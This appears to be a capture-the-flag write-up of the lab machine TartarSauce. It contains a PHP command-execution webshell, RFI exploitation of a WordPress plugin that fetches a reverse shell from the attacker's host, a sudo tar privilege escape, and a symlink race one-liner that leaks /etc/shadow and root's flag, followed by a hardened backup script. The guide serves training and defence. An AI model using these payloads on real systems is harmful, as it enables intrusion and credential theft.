Tartarsauce

Published: 17 May 2025 Author: José Miguel Romero aKa x3m1Sec Difficulty: ⭐ Medium

📝 Description

TartarSauce is a medium-difficulty Linux machine that presents several attack vectors through web applications. The goal is to exploit vulnerabilities in various web services to gain initial access and then escalate privileges through a cron job that runs an insecure backup script. The machine simulates a realistic environment in which the attacker has to chain several techniques to fully compromise the system: from directory enumeration, to exploitation of a vulnerable WordPress plugin, and finally manipulation of a backup script running with elevated privileges to obtain root access.

The machine hosts an Apache web server serving multiple applications, including a WordPress site and a Monstra CMS, each with its own vulnerabilities. The most interesting part is the privilege escalation, which requires a thorough understanding of how a custom backup script works and the ability to take advantage of a specific time window to manipulate files and obtain sensitive information.

This machine is excellent for practising:

  • Thorough web enumeration

  • WordPress plugin exploitation (RFI)

  • Privilege escalation techniques involving cron jobs

  • Race conditions and temporary file manipulation

🔭 Reconnaissance

Ping check based on TTL

❯  ping -c2 10.10.10.88
PING 10.10.10.88 (10.10.10.88) 56(84) bytes of data.
64 bytes from 10.10.10.88: icmp_seq=1 ttl=63 time=150 ms
64 bytes from 10.10.10.88: icmp_seq=2 ttl=63 time=150 ms

--- 10.10.10.88 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1006ms
rtt min/avg/max/mdev = 149.835/149.853/149.872/0.018 ms

💡 Note: A TTL close to 64 suggests this is probably a Linux machine.

Port scan

ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.88 | grep ^[0-9] | cut -d '/' -f1 | tr '\n' ',' | sed s/,$//)
echo $ports
80

Service enumeration

nmap -sC -sV -p$ports 10.10.10.88 -oN services.txt

Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-12 11:54 CEST
Nmap scan report for 10.10.11.28
Host is up (0.048s latency).

PORT     STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Landing Page
| http-robots.txt: 5 disallowed entries 
| /webservices/tar/tar/source/ 
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/ 
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)

🌐 Web Enumeration

80 HTTP

http://10.10.10.88/

Through the robots.txt file we manually enumerate some resources:

http://10.10.10.88/robots.txt

User-agent: *
Disallow: /webservices/tar/tar/source/
Disallow: /webservices/monstra-3.0.4/
Disallow: /webservices/easy-file-uploader/
Disallow: /webservices/developmental/
Disallow: /webservices/phpmyadmin/

🕷️ Directory fuzzing

Let's see what we can enumerate by running automated directory fuzzing with feroxbuster and dirsearch:

feroxbuster -u http://10.10.10.88 -r  -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --scan-dir-listings -C 404 -x php,xml

We find several interesting paths:

http://10.10.10.88/webservices/monstra-3.0.4/admin/

We enumerate a login panel that appears to sit in front of a CMS called Monstra, version 3.0.4. This version appears to be vulnerable to RCE:

We try the default credentials admin:admin and get in. With credentials in hand, we are in a position to use the exploit above to achieve RCE as follows:

searchsploit -m php/webapps/43348.txt

Basically it consists of creating a file with a .php7 extension containing the following content and uploading it through the file upload module

<?php $cmd=$_GET['cmd']; system($cmd); ?>

After trying various extensions we always get the same error:

So this looks like a dead end (rabbit hole) and we have to keep looking for another attack vector:

http://10.10.10.88/webservices/wp/

We notice the content is not loading correctly (probably because virtual hosting is being applied), so we check the page source:

We add the vhost tartarsauce.htb to our /etc/hosts file and reload the page

echo "10.10.10.88 tartarsauce.htb" | sudo tee -a /etc/hosts

Enumerating manually, we see in the page source that the WordPress site uses a theme called voce.

And the WordPress version is 4.9.4

By browsing to http://tartarsauce.htb/webservices/wp/index.php/wp-json/wp/v2/users/ we also discover a user called wpadmin:

We automate this a little with wpscan and confirm the information above:

wpscan --url http://tartarsauce.htb/webservices/wp/ -e ap
Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://tartarsauce.htb/webservices/wp/xmlrpc.php
 | Found By: Link Tag (Passive Detection)
 | Confidence: 100%
 | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://tartarsauce.htb/webservices/wp/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://tartarsauce.htb/webservices/wp/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.4 identified (Insecure, released on 2018-02-06).
 | Found By: Rss Generator (Passive Detection)
 |  - http://tartarsauce.htb/webservices/wp/index.php/feed/, <generator>https://wordpress.org/?v=4.9.4</generator>
 |  - http://tartarsauce.htb/webservices/wp/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.9.4</generator>

[+] WordPress theme in use: voce
 | Location: http://tartarsauce.htb/webservices/wp/wp-content/themes/voce/
 | Latest Version: 1.1.0 (up to date)
 | Last Updated: 2017-09-01T00:00:00.000Z
 | Readme: http://tartarsauce.htb/webservices/wp/wp-content/themes/voce/readme.txt
 | Style URL: http://tartarsauce.htb/webservices/wp/wp-content/themes/voce/style.css?ver=4.9.4
 | Style Name: voce
 | Style URI: http://limbenjamin.com/pages/voce-wp.html
 | Description: voce is a minimal theme, suitable for text heavy articles. The front page features a list of recent ...
 | Author: Benjamin Lim
 | Author URI: https://limbenjamin.com
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.1.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://tartarsauce.htb/webservices/wp/wp-content/themes/voce/style.css?ver=4.9.4, Match: 'Version: 1.1.0'

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:06 <=======================================================================================================> (652 / 652) 100.00% Time: 00:00:06
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:25 <=====================================================================================================> (2575 / 2575) 100.00% Time: 00:00:25

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:01 <========================================================================================================> (137 / 137) 100.00% Time: 00:00:01

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
 Checking DB Exports - Time: 00:00:00 <==============================================================================================================> (75 / 75) 100.00% Time: 00:00:00

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
 Brute Forcing Attachment IDs - Time: 00:00:01 <===================================================================================================> (100 / 100) 100.00% Time: 00:00:01

[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=========================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] wpadmin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://tartarsauce.htb/webservices/wp/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

It does not seem to be enumerating plugins, so we use the --plugins-detection aggressive flag to attempt a more aggressive scan:

wpscan --url http://10.10.10.88:80/webservices/wp -e ap --plugins-detection aggressive

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:18:31 <=================================================================================================> (109775 / 109775) 100.00% Time: 00:18:31
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/
 | Last Updated: 2025-02-14T18:49:00.000Z
 | Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 5.3.7
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/, status: 200
 |
 | Version: 4.0.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt

[+] brute-force-login-protection
 | Location: http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/
 | Latest Version: 1.5.3 (up to date)
 | Last Updated: 2017-06-29T10:39:00.000Z
 | Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/, status: 403
 |
 | Version: 1.5.3 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt

[+] gwolle-gb
 | Location: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/
 | Last Updated: 2025-03-26T17:07:00.000Z
 | Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
 | [!] The version is out of date, the latest version is 4.8.1
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/, status: 200
 |
 | Version: 2.3.10 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt

We have also enumerated a user wpadmin, which we confirm exists by trying it on the login panel: http://tartarsauce.htb/webservices/wp/wp-login.php

Since xmlrpc is enabled, we attempt a brute-force attack, although without success:

wpscan --url http://tartarsauce.htb/webservices/wp/ -P /usr/share/wordlists/rockyou.txt -U "wpadmin"

We check whether any of the plugins enumerated above is vulnerable and find that version 1.5.3 of gwolle-gb is:

💻 Exploitation

CVE-2015-8351

To carry out the exploitation we will use the following exploit:

https://github.com/G4sp4rCS/exploit-CVE-2015-8351

We download the exploit and make it executable

git clone https://github.com/G4sp4rCS/exploit-CVE-2015-8351  
cd exploit-CVE-2015-8351  
chmod +x exploit.py

We copy a pentestmonkey PHP shell, which we will use to exploit the RFI:

cp /usr/share/webshells/php/php-reverse-shell.php .

We set the port and IP of our attacking host in the PHP reverse shell.

We make the PHP reverse shell available from our attacking host with a Python web server:

python3 -m http.server 80

Next we start a listener on the chosen port on our attacking host:

nc -nlvp 1234

We launch the exploit

python3 exploit.py http://10.10.10.88/webservices/wp 10.10.14.8 1234
Error al enviar el exploit. Código de estado: 500

We see it fails because it expects the .php file to be named wp-load.php, so we rename our reverse shell to that name and relaunch the exploit

mv shell.php wp-load.php

Foothold

We gain access to the machine:

www-data@TartarSauce:/home$ cd onuma
bash: cd: onuma: Permission denied
www-data@TartarSauce:/home$ ls -la
total 12
drwxr-xr-x  3 root  root  4096 May 12  2022 .
drwxr-xr-x 22 root  root  4096 May 12  2022 ..
drwxrw----  5 onuma onuma 4096 May 12  2022 onuma

Shell upgrade

script /dev/null -c bash

CTRL + Z

stty raw echo; fg
reset xterm

export TERM=xterm

We enumerate a user directory called onuma, although we do not have permission to view its contents.

We check whether the www-data user can run any command with sudo:

www-data@TartarSauce:/var$ sudo -l
Matching Defaults entries for www-data on TartarSauce:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on TartarSauce:
    (onuma) NOPASSWD: /bin/tar
www-data@TartarSauce:/var$ 

We see that although it cannot run any command as the superuser, it can run one as the onuma user without having to supply a password:

https://gtfobins.github.io/gtfobins/tar/#sudo

We escalate to the onuma user with the following command:

sudo -u onuma /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Once we are onuma we can read the first flag:

onuma@TartarSauce:/var/backups$ cd /home
onuma@TartarSauce:/home$ ls
onuma
onuma@TartarSauce:/home$ cd onuma
onuma@TartarSauce:~$ cat user.txt

👑 Privilege Escalation

We enumerate the machine to look for anything that lets us move laterally and/or escalate privileges. We know a WordPress application is installed, so we check the /var/www/html/webservices/wp directory and find credentials in the wp-config.php file

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wp');

/** MySQL database username */
define('DB_USER', 'wpuser');

/** MySQL database password */
define('DB_PASSWORD', 'w0rdpr3$$d@t@b@$3@cc3$$');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

This looks like another dead end, since this password does not let us connect to the database, nor does it work for the root user.

We continue enumerating and find something interesting in the /var/backups directory

It seems there is a tool the onuma user is using called backuperer.

which backuperer

onuma@TartarSauce:/var/backups$ which backuperer
/usr/sbin/backuperer

We search for references to this file

grep -ilr backuperer / 2>/dev/null

We review the contents of this script

onuma@TartarSauce:/var/backups$ cat /usr/sbin/backuperer 

#!/bin/bash

#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------

# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check

# formatting
printbdr()
{
    for n in $(seq 72);
    do /usr/bin/printf $"-";
    done
}
bdr=$(printbdr)

# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
integrity_chk()
{
    /usr/bin/diff -r $basedir $check$basedir
}

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran :  $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi

Next we go through the most important parts of the script

  • Run /bin/tar as onuma and back up $basedir into a gzip-compressed tar archive called $tmpfile

  • $basedir and $tmpfile are defined in the variables at the top of the script

  • $basedir is defined as /var/www/html

  • $tmpfile is a random name, so /var/tmp/.{randomized_chars}

  • Then the script arbitrarily pauses execution for 30 seconds.

# Test the backup integrity
integrity_chk()
{
    /usr/bin/diff -r $basedir $check$basedir
}
  • Defines a function called integrity_chk that recursively diffs $basedir (/var/www/html) against $check$basedir (/var/tmp/check/var/www/html)

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran :  $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi
  • Creates the $check directory: /var/tmp/check

  • Extracts $tmpfile (/var/tmp/.{randomized_chars}) into $check (/var/tmp/check)

  • Then, if [[ $(integrity_chk) ]]: if diff -r $basedir $check$basedir returns any output, the files in $basedir and in $check$basedir are not the same. The output of the diff command is written to $errormsg: /var/backups/onuma_backup_error.txt

We can see that the script runs at five-minute intervals by inspecting /var/backups/onuma_backup_test.txt and looking at the timestamp of the last run.

I am fairly sure this script is run from the root user's crontab, since the cron job is not in onuma's crontab or in any readable /etc/cron file.

My plan for abusing the script is:

  1. Monitor for the creation of $tmpfile: /var/tmp/.{randomized_chars}

  2. Once this file is created, we have 30 seconds to create a condition under which integrity_chk() produces some output.

  3. Once $tmpfile is created, symlink /root/root.txt and /etc/shadow into /var/www/html as the www-data user

until [[ $(find /var/tmp/ -maxdepth 1 -type f -name '.*') ]] ; do sleep 3 ; done ; mv /var/www/html/index.html /tmp/index.html ; mv /var/www/html/robots.txt /tmp/robots.txt ; ln -s /etc/shadow /var/www/html/index.html ; ln -s /root/root.txt /var/www/html/robots.txt ; until [[ ! $(ps aux | grep backuperer | grep -v grep) ]] ; do sleep 3 ; done ; unlink /var/www/html/index.html ; unlink /var/www/html/robots.txt ; mv /tmp/index.html /var/www/html/index.html ; mv /tmp/robots.txt /var/www/html/robots.txt ; cat /var/backups/onuma_backup_error.txt 

As Jack the Ripper said, let's go piece by piece:

until [[ $(find /var/tmp/ -maxdepth 1 -type f -name '.*') ]] ; do sleep 3 ; done ;
  • Until the find command finds a file name that starts with . in /var/tmp, sleep for 3 seconds in a continuous loop

  • Once that happens, the following series of commands is executed.

mv /var/www/html/index.html /tmp/index.html ; 
mv /var/www/html/robots.txt /tmp/robots.txt ; 
ln -s /etc/shadow /var/www/html/index.html ; 
ln -s /root/root.txt /var/www/html/robots.txt ;
  • Backs up the original index.html and robots.txt files to the /tmp directory

  • Creates a symlink from /etc/shadow to /var/www/html/index.html

  • Creates a symlink from /root/root.txt to /var/www/html/robots.txt

  • Then, once integrity_chk() compares /var/www/html with /var/tmp/check/var/www/html, the index.html and robots.txt in /var/tmp/check will differ from those in /var/www/html, and the differing lines will be written to the error log.

until [[ ! $(ps aux | grep backuperer | grep -v grep) ]] ; do sleep 3 ; done ; unlink /var/www/html/index.html ; unlink /var/www/html/robots.txt ; mv /tmp/index.html /var/www/html/index.html ; mv /tmp/robots.txt /var/www/html/robots.txt ; cat /var/backups/onuma_backup_error.txt 
  • This last part is just a little cleanup. Until the /usr/sbin/backuperer process finishes, keep sleeping for 3 seconds.

  • Then it removes the symlinks and restores the original files from /tmp

  • Finally, it prints the contents of the error file.
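The breakdown above points at three defects in backuperer that together make the leak possible: the integrity check diffs the live web root (where a symlink can be planted during the 30-second window) against the extracted copy; diff's full output, including the contents of whatever a symlink points to, is appended to a file under /var/backups that a low-privileged user can read; and the staging file is a dotfile in the shared /var/tmp. The script below is an added example of a hardened variant of the same backup-and-verify flow, not the machine's script or the author's code. It assumes GNU tar, diff, find and mktemp, and the function names, the www-backup.tar.gz archive name and the backup_error.txt log name are choices made here for illustration.

```shell
#!/usr/bin/env bash
# Hardened backup-and-verify flow (added example, not the machine's backuperer).
# Assumes GNU tar, diff, find and mktemp. Paths are supplied by the caller.

# Return 1 (listing the offenders on stderr) if the tree contains any symlink.
# backuperer followed symlinks planted in /var/www/html; refusing to back up a
# tree that contains them closes that path before anything privileged runs.
webroot_is_clean() {
    basedir=$1
    links=$(find "$basedir" -type l)
    if [ -n "$links" ]; then
        printf 'refusing to back up %s, symlinks present:\n%s\n' "$basedir" "$links" >&2
        return 1
    fi
    return 0
}

# Archive $1 into $2/www-backup.tar.gz and verify the archive in a private
# staging directory. Exit status: 0 ok, 1 tree rejected, 2 integrity check failed.
# The body runs in a subshell so umask and set -e stay local to the function.
safe_backup() (
    set -eu
    basedir=$1
    bkpdir=$2
    errormsg=$bkpdir/backup_error.txt
    umask 077                       # archive, log and staging dir are owner-only

    webroot_is_clean "$basedir" || exit 1

    # mktemp -d gives an unpredictable, mode 0700 directory, unlike the
    # guessable dotfile backuperer dropped into the world-writable /var/tmp.
    work=$(mktemp -d)
    mkdir "$work/check"

    # -C plus basename keeps archive paths relative to the parent directory.
    tar -C "$(dirname "$basedir")" -czf "$work/archive.tgz" "$(basename "$basedir")"
    tar -xzf "$work/archive.tgz" -C "$work/check"

    # -q reports only "Files X and Y differ": no file contents ever reach the
    # log, so a tampered web root cannot turn the checker into a file reader.
    if diff -rq "$basedir" "$work/check/$(basename "$basedir")" > "$work/diff.txt"; then
        mv "$work/archive.tgz" "$bkpdir/www-backup.tar.gz"
        rm -rf "$work"
        exit 0
    fi
    {
        printf 'integrity check failed at %s\n' "$(date)"
        cat "$work/diff.txt"
    } >> "$errormsg"
    rm -rf "$work"
    exit 2
)

# Usage, e.g. from a root cron job:
#   safe_backup /var/www/html /var/backups; echo "status $?"
```

The two checks are complementary: the symlink refusal stops the backup before tar runs as a privileged user, and the quiet diff guarantees that even a difference that does slip through (the live tree is still mutable while the check runs) only ever records file names, never file contents, in a log created with mode 0600.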
